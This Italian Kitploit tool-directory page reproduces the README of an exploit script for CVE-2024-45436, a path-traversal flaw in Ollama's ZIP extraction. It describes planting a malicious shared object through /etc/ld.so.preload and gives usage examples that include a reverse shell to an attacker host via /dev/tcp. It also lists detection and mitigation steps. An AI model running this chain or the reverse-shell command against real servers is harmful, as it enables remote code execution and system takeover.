Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-45436 — script di exploit per CVE-2024-45436 | Kitploit
Strumenti/GitHubGitHub/srcx404/cve-2024-45436
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubsrcx404/cve-2024-45436

CVE-2024-45436

script di exploit per CVE-2024-45436

Vedi Repository
51 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di Ollama CVE-2024-45436

Un'implementazione pulita ed efficiente dell'exploit per la vulnerabilità di traversal ZIP di Ollama (CVE-2024-45436). 中文文档:README_CN.md

Descrizione della vulnerabilità

La CVE-2024-45436 è una vulnerabilità di path traversal (nota anche come "Zip Slip") nelle versioni di Ollama precedenti alla 0.1.47. La vulnerabilità consente agli attaccanti di scrivere file in posizioni arbitrarie del filesystem sfruttando una validazione impropria dei percorsi durante le operazioni di estrazione di file ZIP.

Il difetto risiede nella funzione extractFromZipFile nel file model.go di Ollama, che estrae i file del modello. Quando un file ZIP contiene voci con percorsi che includono sequenze di directory traversal (../), Ollama estrae questi file al di fuori della directory prevista, consentendo potenzialmente a un attaccante di sovrascrivere file critici di sistema.

Meccanismo dell'exploit

Questo exploit sfrutta la vulnerabilità attraverso il seguente approccio:

  1. Crea un file oggetto condiviso malizioso (hook.so) contenente codice di esecuzione di comandi arbitrari
  2. Lo impacchetta in un file ZIP appositamente costruito con voci di path traversal:
    • ../../../../../../../../../../etc/ld.so.preload - Utilizzato per precaricare oggetti condivisi personalizzati
    • ../../../../../../../../../../tmp/hook.so - L'oggetto condiviso malizioso stesso
  3. Carica il file ZIP tramite l'API blob di Ollama
  4. Crea un modello che fa riferimento al blob caricato
  5. Attiva l'esecuzione richiedendo gli embeddings da Ollama

Quando viene eseguito con successo, il payload opera con gli stessi permessi del servizio Ollama, consentendo potenzialmente l'esecuzione remota di codice come root.

Requisiti

  • Python 3.6+
  • Pacchetti Python richiesti:
    • requests
    • argparse
  • GCC (per compilare l'oggetto condiviso)
  • Un'istanza di Ollama vulnerabile (pre-0.1.47) in esecuzione su Linux

Utilizzo

root@kitploit:~
python exp.py <target_url> <command>

Argomenti

  • target_url: L'URL dell'istanza Ollama vulnerabile (es., http://example.com:11434)
  • command: Il comando da eseguire sul sistema di destinazione

Opzioni

  • --no-cleanup: Non rimuovere i file temporanei dopo lo sfruttamento (utile per il debug)

Esempi

Utilizzo base:

root@kitploit:~
python exp.py http://target-server:11434 "id > /tmp/pwned"

Reverse shell:

root@kitploit:~
python exp.py http://target-server:11434 "bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'"

Disclaimer

Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'uso non autorizzato contro sistemi senza permesso esplicito è illegale e contrario all'etica. L'autore non si assume alcuna responsabilità per l'uso improprio di questo software.

Rilevamento

Le organizzazioni possono rilevare se sono vulnerabili:

  1. Controllando la versione di Ollama con /api/version
  2. Cercando file inaspettati in /etc/ld.so.preload o /tmp/hook.so
  3. Monitorando attività insolite di creazione di modelli

Mitigazione

  • Aggiornare Ollama alla versione 0.1.47 o successiva
  • Se un aggiornamento immediato non è possibile, limitare l'accesso di rete agli endpoint API di Ollama
  • Eseguire Ollama con privilegi minimi, non come root

Dettagli tecnici

La vulnerabilità sfrutta una validazione impropria dei percorsi nel processo di estrazione dei file ZIP di Ollama. Quando un modello viene caricato tramite l'API, l'applicazione estrae i file da un archivio ZIP senza sanificare adeguatamente i percorsi dei file, consentendo attacchi di directory traversal.

Il file ld.so.preload viene utilizzato in Linux per specificare le librerie condivise che devono essere caricate prima di tutte le altre. Scrivendo in questo file, l'attaccante può garantire che la propria libreria maliziosa venga caricata da qualsiasi nuovo processo, di fatto dirottando l'esecuzione dei programmi.

Licenza

Questo progetto è concesso in licenza secondo i termini della Licenza MIT - consultare il file LICENSE per i dettagli.

Scarica lo strumento